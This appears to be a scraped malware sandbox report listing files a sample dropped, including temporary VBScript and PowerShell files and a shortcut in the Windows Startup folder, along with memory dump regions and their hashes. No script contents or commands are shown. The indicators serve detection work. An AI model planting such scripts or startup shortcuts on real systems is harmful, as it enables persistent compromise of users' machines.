Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wfhveaqk.33q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
234B

MD5
ba060e0c9c15d075440ea2165e865c25

SHA1
423462f61599745cc5e23a70581c231e544ca369

SHA256
b57e81fe4e752dbe2e5bf03b76b2e673bb0ee8a7fb051f039f9650d966183e80

SHA512
0a3dd1f7d3251e16ee02b094e5559b3159ba09ad73b6499d644c8ebd95325cfb16d8e4856258e68cdc4f11fd8ffd873e2aedf9eac82052a0cb1e45ac56408b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
234B

MD5
ba060e0c9c15d075440ea2165e865c25

SHA1
423462f61599745cc5e23a70581c231e544ca369

SHA256
b57e81fe4e752dbe2e5bf03b76b2e673bb0ee8a7fb051f039f9650d966183e80

SHA512
0a3dd1f7d3251e16ee02b094e5559b3159ba09ad73b6499d644c8ebd95325cfb16d8e4856258e68cdc4f11fd8ffd873e2aedf9eac82052a0cb1e45ac56408b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
234B

MD5
ba060e0c9c15d075440ea2165e865c25

SHA1
423462f61599745cc5e23a70581c231e544ca369

SHA256
b57e81fe4e752dbe2e5bf03b76b2e673bb0ee8a7fb051f039f9650d966183e80

SHA512
0a3dd1f7d3251e16ee02b094e5559b3159ba09ad73b6499d644c8ebd95325cfb16d8e4856258e68cdc4f11fd8ffd873e2aedf9eac82052a0cb1e45ac56408b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
234B

MD5
ba060e0c9c15d075440ea2165e865c25

SHA1
423462f61599745cc5e23a70581c231e544ca369

SHA256
b57e81fe4e752dbe2e5bf03b76b2e673bb0ee8a7fb051f039f9650d966183e80

SHA512
0a3dd1f7d3251e16ee02b094e5559b3159ba09ad73b6499d644c8ebd95325cfb16d8e4856258e68cdc4f11fd8ffd873e2aedf9eac82052a0cb1e45ac56408b09

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
197B

MD5
7a4c59f328e3c516df989a6852fcd1b9

SHA1
320e75cff9f46063f42f0df1e9078cf3f6e7cf55

SHA256
cc8de8af760dbe4b9156c298bd545fcfa4f51e22e82af591c407e6743f3c14d0

SHA512
75a8d6b04f87317da6cd02fd78853e468b38ea750c79604a47265bd206ee196a6e665c73ee72f7c761c4e567867a23574ca8cd67e28826ce213b9052a0d4b1cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk

Filesize
1KB

MD5
f7fd4deb9f64c54a0479aff82b47dd30

SHA1
6057f400acc4eefd0b0b47f304c5e6a84c337d96

SHA256
b3b1b2abff86927eaf9ea41088768864081dcfc2d3f1d104017a6dcc02a66a14

SHA512
32a4b211ef30c66d9647be17279b954666e6a92ab646810cf3e777ba458651303824809234cbb8b81219b11eea393387f5e08b9712fd99f7bca71d924d5ad8b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk

Filesize
1KB

MD5
f7fd4deb9f64c54a0479aff82b47dd30

SHA1
6057f400acc4eefd0b0b47f304c5e6a84c337d96

SHA256
b3b1b2abff86927eaf9ea41088768864081dcfc2d3f1d104017a6dcc02a66a14

SHA512
32a4b211ef30c66d9647be17279b954666e6a92ab646810cf3e777ba458651303824809234cbb8b81219b11eea393387f5e08b9712fd99f7bca71d924d5ad8b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk

Filesize
1KB

MD5
f7fd4deb9f64c54a0479aff82b47dd30

SHA1
6057f400acc4eefd0b0b47f304c5e6a84c337d96

SHA256
b3b1b2abff86927eaf9ea41088768864081dcfc2d3f1d104017a6dcc02a66a14

SHA512
32a4b211ef30c66d9647be17279b954666e6a92ab646810cf3e777ba458651303824809234cbb8b81219b11eea393387f5e08b9712fd99f7bca71d924d5ad8b1

Download Submit
memory/232-349-0x0000000005450000-0x0000000005460000-memory.dmp

Filesize
64KB

Download
memory/468-432-0x000001A1EA620000-0x000001A1EA630000-memory.dmp

Filesize
64KB

Download
memory/468-433-0x000001A1EA620000-0x000001A1EA630000-memory.dmp

Filesize
64KB

Download
memory/1184-539-0x000001CBFF460000-0x000001CBFF470000-memory.dmp

Filesize
64KB

Download
memory/1184-536-0x000001CBFF460000-0x000001CBFF470000-memory.dmp

Filesize
64KB

Download
memory/1184-534-0x000001CBFF460000-0x000001CBFF470000-memory.dmp

Filesize
64KB

Download
memory/1380-257-0x000002086E860000-0x000002086E870000-memory.dmp

Filesize
64KB

Download
memory/1380-259-0x000002086E860000-0x000002086E870000-memory.dmp

Filesize
64KB

Download
memory/1380-256-0x000002086E860000-0x000002086E870000-memory.dmp

Filesize
64KB

Download
memory/1460-316-0x0000026F23810000-0x0000026F23820000-memory.dmp

Filesize
64KB

Download
memory/1460-333-0x0000026F23810000-0x0000026F23820000-memory.dmp

Filesize
64KB

Download
memory/1648-334-0x000001F766830000-0x000001F766840000-memory.dmp

Filesize
64KB

Download
memory/1656-384-0x00000204BBA90000-0x00000204BBAA0000-memory.dmp

Filesize
64KB

Download
memory/1656-383-0x00000204BBA90000-0x00000204BBAA0000-memory.dmp

Filesize
64KB

Download
memory/1656-385-0x00000204BBA90000-0x00000204BBAA0000-memory.dmp

Filesize
64KB

Download
memory/1844-463-0x00000000056E0000-0x00000000056F0000-memory.dmp

Filesize
64KB

Download
memory/2724-317-0x0000024997CE0000-0x0000024997CF0000-memory.dmp

Filesize
64KB

Download
memory/2724-318-0x0000024997CE0000-0x0000024997CF0000-memory.dmp

Filesize
64KB

Download
memory/2744-156-0x000001A268520000-0x000001A268530000-memory.dmp

Filesize
64KB

Download
memory/2744-157-0x000001A268520000-0x000001A268530000-memory.dmp

Filesize
64KB

Download
memory/2744-155-0x000001A268520000-0x000001A268530000-memory.dmp

Filesize
64KB

Download
memory/3132-314-0x000002135C820000-0x000002135C830000-memory.dmp

Filesize
64KB

Download
memory/3132-315-0x000002135C820000-0x000002135C830000-memory.dmp

Filesize
64KB

Download
memory/3284-501-0x000001BC85DD0000-0x000001BC85DE0000-memory.dmp

Filesize
64KB

Download
memory/3284-500-0x000001BC85DD0000-0x000001BC85DE0000-memory.dmp

Filesize
64KB

Download
memory/3284-499-0x000001BC85DD0000-0x000001BC85DE0000-memory.dmp

Filesize
64KB

Download
memory/3304-221-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/3304-229-0x0000000005D50000-0x00000000062F4000-memory.dmp

Filesize
5.6MB

Download
memory/3304-231-0x0000000005870000-0x0000000005880000-memory.dmp

Filesize
64KB

Download
memory/3304-232-0x0000000005C20000-0x0000000005C86000-memory.dmp

Filesize
408KB

Download
memory/3304-234-0x0000000006860000-0x0000000006872000-memory.dmp

Filesize
72KB

Download
memory/3304-230-0x0000000005880000-0x0000000005912000-memory.dmp

Filesize
584KB

Download
memory/3304-258-0x0000000006C80000-0x0000000006CBC000-memory.dmp

Filesize
240KB

Download
memory/3304-351-0x0000000005870000-0x0000000005880000-memory.dmp

Filesize
64KB

Download
memory/3304-269-0x00000000073D0000-0x00000000073DA000-memory.dmp

Filesize
40KB

Download
memory/3684-538-0x000001E9B5920000-0x000001E9B5930000-memory.dmp

Filesize
64KB

Download
memory/3684-537-0x000001E9B5920000-0x000001E9B5930000-memory.dmp

Filesize
64KB

Download
memory/3700-154-0x0000026AA5270000-0x0000026AA5280000-memory.dmp

Filesize
64KB

Download
memory/3700-134-0x0000026AA5270000-0x0000026AA5280000-memory.dmp

Filesize
64KB

Download
memory/3700-135-0x0000026AA5280000-0x0000026AA52A2000-memory.dmp

Filesize
136KB

Download
memory/3700-133-0x0000026AA5270000-0x0000026AA5280000-memory.dmp

Filesize
64KB

Download
memory/3852-336-0x0000019FB6AC0000-0x0000019FB6AD0000-memory.dmp

Filesize
64KB

Download
memory/3852-335-0x0000019FB6AC0000-0x0000019FB6AD0000-memory.dmp

Filesize
64KB

Download
memory/3852-332-0x0000019FB6AC0000-0x0000019FB6AD0000-memory.dmp

Filesize
64KB

Download
memory/3856-464-0x0000019DA14D0000-0x0000019DA14E0000-memory.dmp

Filesize
64KB

Download
memory/3856-456-0x0000019DA14D0000-0x0000019DA14E0000-memory.dmp

Filesize
64KB

Download
memory/4448-271-0x000001EDD4DD0000-0x000001EDD4DE0000-memory.dmp

Filesize
64KB

Download
memory/4448-270-0x000001EDD4DD0000-0x000001EDD4DE0000-memory.dmp

Filesize
64KB

Download
memory/4448-272-0x000001EDD4DD0000-0x000001EDD4DE0000-memory.dmp

Filesize
64KB

Download
memory/4540-498-0x0000013466EF0000-0x0000013466F00000-memory.dmp

Filesize
64KB

Download
memory/4540-497-0x0000013466EF0000-0x0000013466F00000-memory.dmp

Filesize
64KB

Download
memory/4540-496-0x0000013466EF0000-0x0000013466F00000-memory.dmp

Filesize
64KB

Download
memory/4616-437-0x0000017CBD0A0000-0x0000017CBD0B0000-memory.dmp

Filesize
64KB

Download
memory/4616-435-0x0000017CBD0A0000-0x0000017CBD0B0000-memory.dmp

Filesize
64KB

Download
memory/4696-387-0x0000025F60A00000-0x0000025F60A10000-memory.dmp

Filesize
64KB

Download
memory/4696-388-0x0000025F60A00000-0x0000025F60A10000-memory.dmp

Filesize
64KB

Download
memory/4696-386-0x0000025F60A00000-0x0000025F60A10000-memory.dmp

Filesize
64KB

Download
memory/4700-436-0x000002098AE20000-0x000002098AE30000-memory.dmp

Filesize
64KB

Download
memory/4700-434-0x000002098AE20000-0x000002098AE30000-memory.dmp

Filesize
64KB

Download
memory/4736-215-0x00000135E6820000-0x00000135E6830000-memory.dmp

Filesize
64KB

Download
memory/4736-216-0x00000135E6820000-0x00000135E6830000-memory.dmp

Filesize
64KB

Download
memory/4736-218-0x00000135E6820000-0x00000135E6830000-memory.dmp

Filesize
64KB

Download
memory/4820-535-0x000002B781BB0000-0x000002B781BC0000-memory.dmp

Filesize
64KB

Download
memory/4856-220-0x000002C3C79D0000-0x000002C3C79E0000-memory.dmp

Filesize
64KB

Download
memory/4856-217-0x000002C3C79D0000-0x000002C3C79E0000-memory.dmp

Filesize
64KB

Download